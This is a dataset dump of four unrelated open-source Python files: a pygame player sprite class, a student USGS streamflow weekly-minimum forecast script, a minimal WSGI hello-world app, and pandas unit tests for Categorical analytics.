044453674225f4f7f80b35df6406430f80efa084 | cdf99a1d50ef2eae92736aa387e8c9766784d717 | /src/player.py | c818172979b4e3b825ed4f346703395370eaa7aa | [] | no_license | JoseLooLo/Defeat-the-Night | aea81a0d39daa88f57091584389abb776d87c128 | 61262b18dbd72479a16d5702a9875a627910bd81 | refs/heads/master | 2020-05-17T21:34:12.866871 | 2019-06-22T17:29:43 | 2019-06-22T17:29:43 | 183,975,305 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,178 | py | import os, sys
import pygame
import time
from src.colision import Colision
from src.weapon import Weapon
class Player(pygame.sprite.Sprite):
def __init__(self, settings, camera, playerID):
pygame.sprite.Sprite.__init__(self)
self.settings = settings
self.playerID = playerID
self.camera = camera
self.weaponAtual = Weapon(self.settings, self, 0)
self.__init()
def __init(self):
self.__loadVariables()
self.__loadImages()
def __loadVariables(self):
#Variaveis de controle dos Frames
self.qntImagePlayerWalk = self.settings.getPlayerQntImagesWalk(self.playerID)
self.qntImagePlayerStop = self.settings.getPlayerQntImagesStop(self.playerID)
self.qntImagePlayerAttack = self.settings.getPlayerQntImagesAttack(self.playerID)
self.qntImagePlayerJump = self.settings.getPlayerQntImagesJump(self.playerID)
self.numCurrentImagePlayer = 0
self.velocityImagePlayer = self.settings.getPlayerVelocityImages(self.playerID)
self.velocityImagePlayerAttack = self.settings.getPlayerVelocityImagesAttack(self.playerID)
#Variaveis de Status
self.playerDamage = self.settings.getPlayerStatusDamage(self.playerID)
self.playerVelocity = self.settings.getPlayerStatusVelocity(self.playerID)
self.playerLife = self.settings.getPlayerStatusLife(self.playerID)
self.playerMoney = self.settings.getPlayerStatusMoney(self.playerID)
self.playerImunityTime = self.settings.getPlayerStatusImunityTime(self.playerID)
self.countImunityTime = 0
#Jump
self.playerVelocityJump = self.settings.getPlayerStatusVelocityJump(self.playerID)
self.playerHeightJump = self.settings.getPlayerStatusHeightJump(self.playerID)
self.playerStatusDefaultJumpTime = self.settings.playerStatusDefaultJumpTime
self.countInJumpUp = self.playerHeightJump #Contador para a subida no pulo
self.countInJumpDown = 0 #Contador para a descida do pulo
self.countJumpPlayer = 0
self.countAirJumpPlayer = 0
#Variaveis de controle
self.inMoving = False
self.inJump = False
self.inAirJump = False
self.inDamage = False #Verifica se está dentro do tempo de invulnerabilidade
self.inAtack = False
self.colisionRight = False
self.colisionLeft = False
self.posXMouseInScreenIsRightSide = False
self.startMoviment = False
#Time
self.startChangeImage = time.time()
self.endChangeImage = time.time()
def __loadImages(self):
self.__imagePlayerWalk = []
for i in range(self.qntImagePlayerWalk):
tempImage = self.settings.load_Images("walking"+str(i)+".png", "Player/ID"+str(self.playerID), -1)
self.__imagePlayerWalk.append(tempImage)
self.__imagePlayerStop = []
for i in range(self.qntImagePlayerStop):
tempImage = self.settings.load_Images("stopped"+str(i)+".png", "Player/ID"+str(self.playerID), -1)
self.__imagePlayerStop.append(tempImage)
self.__imagePlayerAttack = []
for i in range(self.qntImagePlayerAttack):
tempImage = self.settings.load_Images("attack"+str(i)+".png", "Player/ID"+str(self.playerID), -1)
self.__imagePlayerAttack.append(tempImage)
self.__imagePlayerJump = []
for i in range(self.qntImagePlayerJump):
tempImage = self.settings.load_Images("jump"+str(i)+".png", "Player/ID"+str(self.playerID), -1)
self.__imagePlayerJump.append(tempImage)
self.__currentImagePlayer = self.__imagePlayerStop[0]
self.__rectPlayer = self.__currentImagePlayer.get_rect()
self.__rectPlayer.y += self.camera.getPosYplayer()
#-----------------------------------
#Jump
def __setImagePlayerJump(self, numImg):
self.__currentImagePlayer = self.__imagePlayerJump[numImg]
self.numCurrentImagePlayer = numImg
self.__flipImage()
def __setProxImagePlayerJump(self):
if self.numCurrentImagePlayer == self.qntImagePlayerJump -1:
pass
#self.numCurrentImagePlayer = 0
#self.__setImagePlayerJump(0)
else:
self.__setImagePlayerJump(self.numCurrentImagePlayer + 1)
#-----------------------------------
#-----------------------------------
#Walk
def __setImagePlayerWalk(self, numImg):
self.__currentImagePlayer = self.__imagePlayerWalk[numImg]
self.numCurrentImagePlayer = numImg
self.__flipImage()
def __setProxImagePlayerMoving(self):
if self.inMoving:
if self.numCurrentImagePlayer == self.qntImagePlayerWalk -1:
self.__setImagePlayerWalk(0)
else:
self.__setImagePlayerWalk(self.numCurrentImagePlayer + 1)
else:
self.startMoviment = False
if self.numCurrentImagePlayer == self.qntImagePlayerStop -1:
self.__setImagePlayerStop(0)
else:
self.__setImagePlayerStop(self.numCurrentImagePlayer + 1)
#-----------------------------------
#-----------------------------------
#Stop
def __setImagePlayerStop(self, numImg):
self.__currentImagePlayer = self.__imagePlayerStop[numImg]
self.numCurrentImagePlayer = numImg
self.__flipImage()
#-----------------------------------
#-----------------------------------
#Attack
def __setImagePlayerAttack(self, numImg):
self.__currentImagePlayer = self.__imagePlayerAttack[numImg]
self.numCurrentImagePlayer = numImg
self.weaponAtual.setCurrentImage(self.numCurrentImagePlayer)
self.weaponAtual.resetFlipDis()
self.__flipImage()
def __setProxImagePlayerAttack(self):
if self.numCurrentImagePlayer == self.qntImagePlayerAttack -1:
self.inAtack = False
self.numCurrentImagePlayer = 0
#self.__setImagePlayerAttack(0)
else:
self.__setImagePlayerAttack(self.numCurrentImagePlayer + 1)
#-----------------------------------
def __setProxImagePlayer(self):
#Maquinas de estado do player, não podem ser chamadas ao mesmo
if self.inAtack:
self.__setProxImagePlayerAttack()
elif self.inJump:
self.__setProxImagePlayerJump()
else:
self.__setProxImagePlayerMoving()
def setInMoving(self, inMoving):
self.inMoving = inMoving
if not inMoving and not self.inAtack:
self.resetCurrentImagePlayer()
self.inMoving = inMoving
def setInJump(self, inJump):
if self.inAtack:
return
self.inJump = inJump
self.resetCurrentImagePlayer()
def resetCurrentImagePlayer(self):
self.numCurrentImagePlayer = 0
def resetCurrentImagePlayerAfterJump(self):
self.numCurrentImagePlayer = 1
def getPlayerPosX(self):
return self.camera.getPosXplayer() + self.settings.screen_width/2
def update(self):
self.__updateMousePosition()
self.__updateImages()
self.__updateStep()
self.__updateJump()
self.__updateCounters()
def __updateCounters(self):
if self.inDamage:
self.countImunityTime+=1
def __updateImages(self):
tempVelocity = self.velocityImagePlayer
if self.inAtack:
tempVelocity = self.velocityImagePlayerAttack
self.endChangeImage = time.time()
if self.endChangeImage - self.startChangeImage >= tempVelocity:
self.startChangeImage = time.time()
self.__setProxImagePlayer()
def __updateStep(self):
if (self.numCurrentImagePlayer >= 1 or self.startMoviment) and self.inMoving:
self.startMoviment = True
self.__step()
def __step(self):
if not self.__verificaExtremos() and self.inMoving:
if self.playerVelocity < 0 and not self.colisionLeft: #Verifica se o jogador está se movendo para a esquerda e se não está colidindo pela esquerda
self.camera.addPlayerPosX(self.playerVelocity) #Altera a posição do jogador (Na real altera a posição posX que é do background, o personagem é fixo no meio do background)
elif self.playerVelocity > 0 and not self.colisionRight:
self.camera.addPlayerPosX(self.playerVelocity)
def __verificaExtremos(self):
if self.camera.getPosXplayer() + self.playerVelocity < self.settings.screen_width/2:
return True
if self.camera.getPosXplayer() + self.playerVelocity > self.camera.getBackgroundImageW() - self.settings.screen_width - self.__rectPlayer.w/2:
return True
return False
def __updateJump(self):
if self.inJump:
self.__jump()
def __jump(self):
if self.countInJumpUp - self.playerStatusDefaultJumpTime > 0:
self.countInJumpUp -= self.playerStatusDefaultJumpTime
self.countInJumpDown += self.playerStatusDefaultJumpTime
self.__rectPlayer.y += self.playerStatusDefaultJumpTime
else:
if self.countInJumpDown == 0:
self.inJump = False
self.resetCurrentImagePlayer()
self.countInJumpUp = self.playerHeightJump
self.countInJumpDown = 0
else:
self.countInJumpDown -= self.playerStatusDefaultJumpTime
self.__rectPlayer.y -= self.playerStatusDefaultJumpTime
def __updateMousePosition(self):
#Muda a variavel de controle para verificar a posição do mouse na tela
metadeTelaX = int(self.settings.screen_width/2)
#pygame.mouse.get_pos()[0] pega a posição X do cursor do mouse atual
if pygame.mouse.get_pos()[0] > metadeTelaX:
self.posXMouseInScreenIsRightSide = True
else:
self.posXMouseInScreenIsRightSide = False
def __flipImage(self):
if not self.posXMouseInScreenIsRightSide:
tempColorKey = self.__currentImagePlayer.get_colorkey()
tempImage = pygame.transform.flip(self.__currentImagePlayer, True, False)
tempImage.set_colorkey(tempColorKey)
self.__currentImagePlayer = tempImage
tempY = self.__rectPlayer.y
self.__rectPlayer = self.__currentImagePlayer.get_rect()
self.__rectPlayer.y = tempY
self.weaponAtual.flipImage()
def resetVariables(self):
self.__loadVariables()
def draw(self, camera):
camera.drawScreenFix(self.__currentImagePlayer, (self.settings.screen_width/2, self.settings.valuePosY-self.__rectPlayer.h-self.__rectPlayer.y))
if self.inAtack:
camera.drawScreenFix(self.weaponAtual.getCurrentImage(), (self.settings.screen_width/2+self.weaponAtual.flipDis, self.settings.valuePosY-self.__rectPlayer.h-self.__rectPlayer.y-8))
def getRectPlayer(self):
tempRect = self.__rectPlayer.copy()
tempRect.x = self.getPlayerPosX()
return tempRect
def getWeapon(self):
return self.weaponAtual
def removeColision(self):
self.colisionLeft = False
self.colisionRight = False
def setDamage(self, damage):
if self.inDamage: #Se já levou dano e está no tempo de invunerabilidade
#A variabel contador de imunidade é incrementada no update de contadores
if self.countImunityTime >= self.playerImunityTime:
self.inDamage = False
self.countImunityTime = 0
else:
self.inDamage = True
self.countImunityTime = 0
if self.playerLife - damage <= 0:
self.playerLife = 0
else:
self.playerLife -= damage
if self.settings.generalInfo:
print ("Damage %d | Life %d" % (damage, self.playerLife))
def attack(self):
if self.inJump or self.inAtack:
return
self.inAtack = True
self.numCurrentImagePlayer = 0
def getMoneyFromChat(self, value):
self.playerMoney += value
print ("Get money %d (from chat)" % (value))
def getWeaponDamageFromChat(self, value):
self.playerDamage += value
print ("Get weapon damage %d (from chat)" % (value))
def getHPFromChat(self, value):
self.playerLife += value
print ("Get HP %d (from chat)" % (value))
def setHPFromChat(self, value):
self.playerLife = value
print ("Set HP %d (from chat)" % (value))
def getVelocityFromChat(self, value):
self.playerVelocity += value
print ("Get Velocity %d (from chat)" % (value)) | [
"joseloolo@hotmail.com"
] | joseloolo@hotmail.com |
5fdb4b233dd4fdfcfd42200e296d2938286f979a | f3c27ed7c4e2b9f4df497f7371cfd585d3b0bba4 | /Submissions/team_forecast/Bits and Pieces/Step10.py | 74e41bdb80def8d4b3182b5cb0f5c6cea284df5d | [] | no_license | genoonan/homework-genoonan | f69c7e0a6bd744d8d960fdf7c689b0afa9af09a8 | a4bd1e5ab73d2185668a6d2c333cd64c4a487b97 | refs/heads/master | 2023-01-27T22:07:37.471752 | 2020-12-08T12:41:05 | 2020-12-08T12:41:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,559 | py | # %%
# Import the modules we will use
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.linear_model import LinearRegression
import datetime
import urllib.request as req
import urllib
import scipy
# %%
def weekly_min1(month1, day_more, day_less):
'''Function (weekly_min1):
This function is for time windows within the same month.
It pulls values out of the data_week_min dataframe which
is aggregated by weekly minimum value. The historical minimums are
plotted over the data time period. It then pulls the
minimum historical value from the weekly minimum values
for the given month, day time period. It removes 2020 data so that
the historical forecast only uses data prior to the forecast period.
Parameters
----------
month1: int
Input variable with one value representing
first month of the time window
day_more: int
Input variable with one value representing
first day of the time window
day_less: int
Input variable with one value representing
last day of the time window
Returns
------
wk_min : dataframe
Outputs a dataframe with only data for specified time period
and prints the output minimum flow value
'''
wk_min = data_week_min[(data_week_min.index.month == month1)
& (data_week_min.index.day >= day_more)
& (data_week_min.index.day <= day_less)
& (data_week_min.index.year != 2020)]
print("")
print("Plotted historical weekly minimum flows for ", month1, "-",
day_more, "to", month1, "-", day_less)
wk_min.reset_index().plot(x="datetime",
y="flow",
title="Historical Flow Weekly Minimums",
kind="scatter")
plt.show()
print("The overall historical weekly minimum flow for ",
month1, "-", day_more, "to", month1, "-", day_less,
" is", wk_min.flow.min(), "cfs")
seasonal_list.append(wk_min.flow.min())
def weekly_min2(month1, day1, month2, day2):
'''Function (weekly_min2):
This function is for time windows spanning two months.
It pulls values out of the data_week_min dataframe which
is aggregated by weekly minimum value. The historical minimums are
plotted over the data time period. It then pulls the
minimum historical value from the weekly minimum values
for the given month, day time period. It removes 2020 data so that
the historical forecast only uses data prior to the forecast period.
Parameters
----------
month1: int
Input variable with one value representing
first month of the time window
day1: int
Input variable with one value representing
first day of the time window
month2: int
Input variable with one value representing
second month of the time window
day2: int
Input variable with one value representing
last day of the time window
Returns
------
wk_min : dataframe
Outputs a dataframe with only data for specified time period
and prints the output minimum flow value'''
wk_min = data_week_min[((data_week_min.index.month == month1)
& (data_week_min.index.day >= day1)
| (data_week_min.index.month == month2)
& (data_week_min.index.day <= day2))
& (data_week_min.index.year != 2020)]
print("")
print("Plotted historical weekly minimum flows for ", month1, "-", day1,
"to", month2, "-", day2)
wk_min.reset_index().plot(x="datetime",
y="flow",
title="Historical Flow Weekly Minimums",
kind="scatter")
plt.show()
print("The overall historical weekly minimum flow for ", month1, "-", day1,
"to", month2, "-", day2, " is",
wk_min.flow.min(), "cfs")
seasonal_list.append(wk_min.flow.min())
# %%
# Step 1: Import USGS flow data
# Replace parts of url with variables
site = '09506000'
start = '1989-01-01'
end = '2020-10-31' # Update end date each week to Saturday
url = "https://waterdata.usgs.gov/nwis/dv?cb_00060=on&format=rdb&site_no=" + \
site + "&referred_module=sw&period=&begin_date=" + start + "&end_date=" + \
end
data = pd.read_table(url, skiprows=30, names=['agency_cd', 'site_no',
'datetime', 'flow', 'code'],
parse_dates=['datetime'])
# Expand the dates to year month day
data['year'] = pd.DatetimeIndex(data['datetime']).year
data['month'] = pd.DatetimeIndex(data['datetime']).month
data['day'] = pd.DatetimeIndex(data['datetime']).day
data['dayofweek'] = pd.DatetimeIndex(data['datetime']).dayofweek
# %%
# Step 10: # Generate long term forecast based on historical minimums
# First aggregate flow values to weekly MINIMUM
data_week_min = data.resample("W-SAT", on='datetime').min()
# Reset index to be first day of week instead of last
data_week_min = data_week_min.set_index("datetime")
# %%
# Plot historical weekly flows for each forecast week
# Use functions 'weekly_min1' or 'weekly_min2' to grab historical minimum flow
# %%
# Set empty list
seasonal_list = list()
# Wk1 historical min (8/22 - 8/29)
month1 = 8
day_more = 22
day_less = 29
weekly_min1(month1, day_more, day_less)
# Wk2 historical min (8/30 - 9/5)(spans two months so does not use function)
month1 = 8
day1 = 30
month2 = 9
day2 = 5
weekly_min2(month1, day1, month2, day2)
# Wk3 historical min (9/6 - 9/12)
month1 = 9
day_more = 6
day_less = 12
weekly_min1(month1, day_more, day_less)
# Wk4 historical min (9/13 - 9/19)
month1 = 9
day_more = 13
day_less = 19
weekly_min1(month1, day_more, day_less)
# Wk5 historical min (9/20 - 9/26)
month1 = 9
day_more = 20
day_less = 26
weekly_min1(month1, day_more, day_less)
# Wk6 historical min (9/27 - 10/3) (spans two months so does not use function)
month1 = 9
day1 = 27
month2 = 10
day2 = 3
weekly_min2(month1, day1, month2, day2)
# Wk7 historical min (10/4 - 10/10)
month1 = 10
day_more = 4
day_less = 10
weekly_min1(month1, day_more, day_less)
# Wk8 historical min (10/11 - 10/17)
month1 = 10
day_more = 11
day_less = 17
weekly_min1(month1, day_more, day_less)
# Wk9 historical min (10/18 - 10/24)
month1 = 10
day_more = 18
day_less = 24
weekly_min1(month1, day_more, day_less)
# Wk10 historical min (10/25 - 10/31)
month1 = 10
day_more = 25
day_less = 31
weekly_min1(month1, day_more, day_less)
# Wk11 historical min (11/1 - 11/7)
month1 = 11
day_more = 1
day_less = 7
weekly_min1(month1, day_more, day_less)
# Wk12 historical min (11/8 - 11/14)
month1 = 11
day_more = 8
day_less = 14
weekly_min1(month1, day_more, day_less)
# Wk13 historical min (11/15 - 11/21)
month1 = 11
day_more = 15
day_less = 21
weekly_min1(month1, day_more, day_less)
# Wk14 historical min (11/22 - 11/28)
month1 = 11
day_more = 22
day_less = 28
weekly_min1(month1, day_more, day_less)
# Wk15 historical min (11/29 - 12/5)(spans two months so does not use function)
month1 = 11
day1 = 29
month2 = 12
day2 = 5
weekly_min2(month1, day1, month2, day2)
# Wk16 historical min (12/6 - 12/12)
month1 = 12
day_more = 6
day_less = 12
weekly_min1(month1, day_more, day_less)
# %%
print("Seasonal forecast list =", seasonal_list)
# %%
| [
"gillianerin@gmail.com"
] | gillianerin@gmail.com |
9164ce0de0c4b054d9f1697160fdb022c4602817 | d68554f9194e949020c62af92ad94c1ce137a29a | /web/hello.py | 8bde944011b0e44cf89e50e69b61b8689799137a | [] | no_license | 7colorlotus/pythonLearn | f60c9cbc0be0a42f3676f59cbdabe1e7947c8527 | e4e6a0d1ad3d389002cb96b8367618b32d5be4e8 | refs/heads/master | 2020-05-22T06:57:39.084279 | 2019-07-19T07:11:08 | 2019-07-19T07:11:08 | 64,715,660 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 207 | py | #hello.py
def application(environ,start_response):
start_response('200 OK',[('Content-Type','text/html')])
body = '<h1>Hello,%s!</h1>' % (environ['PATH_INFO'][1:] or 'web')
return [body.encode('utf-8')]
| [
"626477293@qq.com"
] | 626477293@qq.com |
d5d74faabbe533b0b669c36f2c141f32fc8b63aa | 209a7a4023a9a79693ec1f6e8045646496d1ea71 | /COMP0016_2020_21_Team12-datasetsExperimentsAna/pwa/FADapp/pythonScripts/venv/Lib/site-packages/pandas/tests/arrays/categorical/test_analytics.py | 6aa36525fd6980d29cb1249c01c9b0434bf179be | [
"MIT"
] | permissive | anzhao920/MicrosoftProject15_Invictus | 5e2347015411bbffbdf0ceb059df854661fb240c | 15f44eebb09561acbbe7b6730dfadf141e4c166d | refs/heads/main | 2023-04-16T13:24:39.332492 | 2021-04-27T00:47:13 | 2021-04-27T00:47:13 | 361,913,170 | 0 | 0 | MIT | 2021-04-26T22:41:56 | 2021-04-26T22:41:55 | null | UTF-8 | Python | false | false | 14,794 | py | import re
import sys
import numpy as np
import pytest
from pandas.compat import PYPY
from pandas import Categorical, Index, NaT, Series, date_range
import pandas._testing as tm
from pandas.api.types import is_scalar
class TestCategoricalAnalytics:
@pytest.mark.parametrize("aggregation", ["min", "max"])
def test_min_max_not_ordered_raises(self, aggregation):
# unordered cats have no min/max
cat = Categorical(["a", "b", "c", "d"], ordered=False)
msg = f"Categorical is not ordered for operation {aggregation}"
agg_func = getattr(cat, aggregation)
with pytest.raises(TypeError, match=msg):
agg_func()
def test_min_max_ordered(self):
cat = Categorical(["a", "b", "c", "d"], ordered=True)
_min = cat.min()
_max = cat.max()
assert _min == "a"
assert _max == "d"
cat = Categorical(
["a", "b", "c", "d"], categories=["d", "c", "b", "a"], ordered=True
)
_min = cat.min()
_max = cat.max()
assert _min == "d"
assert _max == "a"
@pytest.mark.parametrize(
"categories,expected",
[
(list("ABC"), np.NaN),
([1, 2, 3], np.NaN),
pytest.param(
Series(date_range("2020-01-01", periods=3), dtype="category"),
NaT,
marks=pytest.mark.xfail(
reason="https://github.com/pandas-dev/pandas/issues/29962"
),
),
],
)
@pytest.mark.parametrize("aggregation", ["min", "max"])
def test_min_max_ordered_empty(self, categories, expected, aggregation):
# GH 30227
cat = Categorical([], categories=categories, ordered=True)
agg_func = getattr(cat, aggregation)
result = agg_func()
assert result is expected
@pytest.mark.parametrize(
"values, categories",
[(["a", "b", "c", np.nan], list("cba")), ([1, 2, 3, np.nan], [3, 2, 1])],
)
@pytest.mark.parametrize("skipna", [True, False])
@pytest.mark.parametrize("function", ["min", "max"])
def test_min_max_with_nan(self, values, categories, function, skipna):
# GH 25303
cat = Categorical(values, categories=categories, ordered=True)
result = getattr(cat, function)(skipna=skipna)
if skipna is False:
assert result is np.nan
else:
expected = categories[0] if function == "min" else categories[2]
assert result == expected
@pytest.mark.parametrize("function", ["min", "max"])
@pytest.mark.parametrize("skipna", [True, False])
def test_min_max_only_nan(self, function, skipna):
# https://github.com/pandas-dev/pandas/issues/33450
cat = Categorical([np.nan], categories=[1, 2], ordered=True)
result = getattr(cat, function)(skipna=skipna)
assert result is np.nan
@pytest.mark.parametrize("method", ["min", "max"])
def test_deprecate_numeric_only_min_max(self, method):
# GH 25303
cat = Categorical(
[np.nan, 1, 2, np.nan], categories=[5, 4, 3, 2, 1], ordered=True
)
with tm.assert_produces_warning(expected_warning=FutureWarning):
getattr(cat, method)(numeric_only=True)
@pytest.mark.parametrize("method", ["min", "max"])
def test_numpy_min_max_raises(self, method):
cat = Categorical(["a", "b", "c", "b"], ordered=False)
msg = (
f"Categorical is not ordered for operation {method}\n"
"you can use .as_ordered() to change the Categorical to an ordered one"
)
method = getattr(np, method)
with pytest.raises(TypeError, match=re.escape(msg)):
method(cat)
@pytest.mark.parametrize("kwarg", ["axis", "out", "keepdims"])
@pytest.mark.parametrize("method", ["min", "max"])
def test_numpy_min_max_unsupported_kwargs_raises(self, method, kwarg):
cat = Categorical(["a", "b", "c", "b"], ordered=True)
msg = (
f"the '{kwarg}' parameter is not supported in the pandas implementation "
f"of {method}"
)
if kwarg == "axis":
msg = r"`axis` must be fewer than the number of dimensions \(1\)"
kwargs = {kwarg: 42}
method = getattr(np, method)
with pytest.raises(ValueError, match=msg):
method(cat, **kwargs)
@pytest.mark.parametrize("method, expected", [("min", "a"), ("max", "c")])
def test_numpy_min_max_axis_equals_none(self, method, expected):
cat = Categorical(["a", "b", "c", "b"], ordered=True)
method = getattr(np, method)
result = method(cat, axis=None)
assert result == expected
@pytest.mark.parametrize(
"values,categories,exp_mode",
[
([1, 1, 2, 4, 5, 5, 5], [5, 4, 3, 2, 1], [5]),
([1, 1, 1, 4, 5, 5, 5], [5, 4, 3, 2, 1], [5, 1]),
([1, 2, 3, 4, 5], [5, 4, 3, 2, 1], [5, 4, 3, 2, 1]),
([np.nan, np.nan, np.nan, 4, 5], [5, 4, 3, 2, 1], [5, 4]),
([np.nan, np.nan, np.nan, 4, 5, 4], [5, 4, 3, 2, 1], [4]),
([np.nan, np.nan, 4, 5, 4], [5, 4, 3, 2, 1], [4]),
],
)
def test_mode(self, values, categories, exp_mode):
s = Categorical(values, categories=categories, ordered=True)
res = s.mode()
exp = Categorical(exp_mode, categories=categories, ordered=True)
tm.assert_categorical_equal(res, exp)
def test_searchsorted(self, ordered):
# https://github.com/pandas-dev/pandas/issues/8420
# https://github.com/pandas-dev/pandas/issues/14522
cat = Categorical(
["cheese", "milk", "apple", "bread", "bread"],
categories=["cheese", "milk", "apple", "bread"],
ordered=ordered,
)
ser = Series(cat)
# Searching for single item argument, side='left' (default)
res_cat = cat.searchsorted("apple")
assert res_cat == 2
assert is_scalar(res_cat)
res_ser = ser.searchsorted("apple")
assert res_ser == 2
assert is_scalar(res_ser)
# Searching for single item array, side='left' (default)
res_cat = cat.searchsorted(["bread"])
res_ser = ser.searchsorted(["bread"])
exp = np.array([3], dtype=np.intp)
tm.assert_numpy_array_equal(res_cat, exp)
tm.assert_numpy_array_equal(res_ser, exp)
# Searching for several items array, side='right'
res_cat = cat.searchsorted(["apple", "bread"], side="right")
res_ser = ser.searchsorted(["apple", "bread"], side="right")
exp = np.array([3, 5], dtype=np.intp)
tm.assert_numpy_array_equal(res_cat, exp)
tm.assert_numpy_array_equal(res_ser, exp)
# Searching for a single value that is not from the Categorical
with pytest.raises(KeyError, match="cucumber"):
cat.searchsorted("cucumber")
with pytest.raises(KeyError, match="cucumber"):
ser.searchsorted("cucumber")
# Searching for multiple values one of each is not from the Categorical
with pytest.raises(KeyError, match="cucumber"):
cat.searchsorted(["bread", "cucumber"])
with pytest.raises(KeyError, match="cucumber"):
ser.searchsorted(["bread", "cucumber"])
def test_unique(self):
# categories are reordered based on value when ordered=False
cat = Categorical(["a", "b"])
exp = Index(["a", "b"])
res = cat.unique()
tm.assert_index_equal(res.categories, exp)
tm.assert_categorical_equal(res, cat)
cat = Categorical(["a", "b", "a", "a"], categories=["a", "b", "c"])
res = cat.unique()
tm.assert_index_equal(res.categories, exp)
tm.assert_categorical_equal(res, Categorical(exp))
cat = Categorical(["c", "a", "b", "a", "a"], categories=["a", "b", "c"])
exp = Index(["c", "a", "b"])
res = cat.unique()
tm.assert_index_equal(res.categories, exp)
exp_cat = Categorical(exp, categories=["c", "a", "b"])
tm.assert_categorical_equal(res, exp_cat)
# nan must be removed
cat = Categorical(["b", np.nan, "b", np.nan, "a"], categories=["a", "b", "c"])
res = cat.unique()
exp = Index(["b", "a"])
tm.assert_index_equal(res.categories, exp)
exp_cat = Categorical(["b", np.nan, "a"], categories=["b", "a"])
tm.assert_categorical_equal(res, exp_cat)
def test_unique_ordered(self):
# keep categories order when ordered=True
cat = Categorical(["b", "a", "b"], categories=["a", "b"], ordered=True)
res = cat.unique()
exp_cat = Categorical(["b", "a"], categories=["a", "b"], ordered=True)
tm.assert_categorical_equal(res, exp_cat)
cat = Categorical(
["c", "b", "a", "a"], categories=["a", "b", "c"], ordered=True
)
res = cat.unique()
exp_cat = Categorical(["c", "b", "a"], categories=["a", "b", "c"], ordered=True)
tm.assert_categorical_equal(res, exp_cat)
cat = Categorical(["b", "a", "a"], categories=["a", "b", "c"], ordered=True)
res = cat.unique()
exp_cat = Categorical(["b", "a"], categories=["a", "b"], ordered=True)
tm.assert_categorical_equal(res, exp_cat)
cat = Categorical(
["b", "b", np.nan, "a"], categories=["a", "b", "c"], ordered=True
)
res = cat.unique()
exp_cat = Categorical(["b", np.nan, "a"], categories=["a", "b"], ordered=True)
tm.assert_categorical_equal(res, exp_cat)
def test_unique_index_series(self):
c = Categorical([3, 1, 2, 2, 1], categories=[3, 2, 1])
# Categorical.unique sorts categories by appearance order
# if ordered=False
exp = Categorical([3, 1, 2], categories=[3, 1, 2])
tm.assert_categorical_equal(c.unique(), exp)
tm.assert_index_equal(Index(c).unique(), Index(exp))
tm.assert_categorical_equal(Series(c).unique(), exp)
c = Categorical([1, 1, 2, 2], categories=[3, 2, 1])
exp = Categorical([1, 2], categories=[1, 2])
tm.assert_categorical_equal(c.unique(), exp)
tm.assert_index_equal(Index(c).unique(), Index(exp))
tm.assert_categorical_equal(Series(c).unique(), exp)
c = Categorical([3, 1, 2, 2, 1], categories=[3, 2, 1], ordered=True)
# Categorical.unique keeps categories order if ordered=True
exp = Categorical([3, 1, 2], categories=[3, 2, 1], ordered=True)
tm.assert_categorical_equal(c.unique(), exp)
tm.assert_index_equal(Index(c).unique(), Index(exp))
tm.assert_categorical_equal(Series(c).unique(), exp)
def test_shift(self):
# GH 9416
cat = Categorical(["a", "b", "c", "d", "a"])
# shift forward
sp1 = cat.shift(1)
xp1 = Categorical([np.nan, "a", "b", "c", "d"])
tm.assert_categorical_equal(sp1, xp1)
tm.assert_categorical_equal(cat[:-1], sp1[1:])
# shift back
sn2 = cat.shift(-2)
xp2 = Categorical(
["c", "d", "a", np.nan, np.nan], categories=["a", "b", "c", "d"]
)
tm.assert_categorical_equal(sn2, xp2)
tm.assert_categorical_equal(cat[2:], sn2[:-2])
# shift by zero
tm.assert_categorical_equal(cat, cat.shift(0))
def test_nbytes(self):
cat = Categorical([1, 2, 3])
exp = 3 + 3 * 8 # 3 int8s for values + 3 int64s for categories
assert cat.nbytes == exp
def test_memory_usage(self):
cat = Categorical([1, 2, 3])
# .categories is an index, so we include the hashtable
assert 0 < cat.nbytes <= cat.memory_usage()
assert 0 < cat.nbytes <= cat.memory_usage(deep=True)
cat = Categorical(["foo", "foo", "bar"])
assert cat.memory_usage(deep=True) > cat.nbytes
if not PYPY:
# sys.getsizeof will call the .memory_usage with
# deep=True, and add on some GC overhead
diff = cat.memory_usage(deep=True) - sys.getsizeof(cat)
assert abs(diff) < 100
def test_map(self):
c = Categorical(list("ABABC"), categories=list("CBA"), ordered=True)
result = c.map(lambda x: x.lower())
exp = Categorical(list("ababc"), categories=list("cba"), ordered=True)
tm.assert_categorical_equal(result, exp)
c = Categorical(list("ABABC"), categories=list("ABC"), ordered=False)
result = c.map(lambda x: x.lower())
exp = Categorical(list("ababc"), categories=list("abc"), ordered=False)
tm.assert_categorical_equal(result, exp)
result = c.map(lambda x: 1)
# GH 12766: Return an index not an array
tm.assert_index_equal(result, Index(np.array([1] * 5, dtype=np.int64)))
@pytest.mark.parametrize("value", [1, "True", [1, 2, 3], 5.0])
def test_validate_inplace_raises(self, value):
cat = Categorical(["A", "B", "B", "C", "A"])
msg = (
'For argument "inplace" expected type bool, '
f"received type {type(value).__name__}"
)
with pytest.raises(ValueError, match=msg):
cat.set_ordered(value=True, inplace=value)
with pytest.raises(ValueError, match=msg):
cat.as_ordered(inplace=value)
with pytest.raises(ValueError, match=msg):
cat.as_unordered(inplace=value)
with pytest.raises(ValueError, match=msg):
cat.set_categories(["X", "Y", "Z"], rename=True, inplace=value)
with pytest.raises(ValueError, match=msg):
cat.rename_categories(["X", "Y", "Z"], inplace=value)
with pytest.raises(ValueError, match=msg):
cat.reorder_categories(["X", "Y", "Z"], ordered=True, inplace=value)
with pytest.raises(ValueError, match=msg):
cat.add_categories(new_categories=["D", "E", "F"], inplace=value)
with pytest.raises(ValueError, match=msg):
cat.remove_categories(removals=["D", "E", "F"], inplace=value)
with pytest.raises(ValueError, match=msg):
with tm.assert_produces_warning(FutureWarning):
# issue #37643 inplace kwarg deprecated
cat.remove_unused_categories(inplace=value)
with pytest.raises(ValueError, match=msg):
cat.sort_values(inplace=value)
| [
"ana.kapros@yahoo.ro"
] | ana.kapros@yahoo.ro |
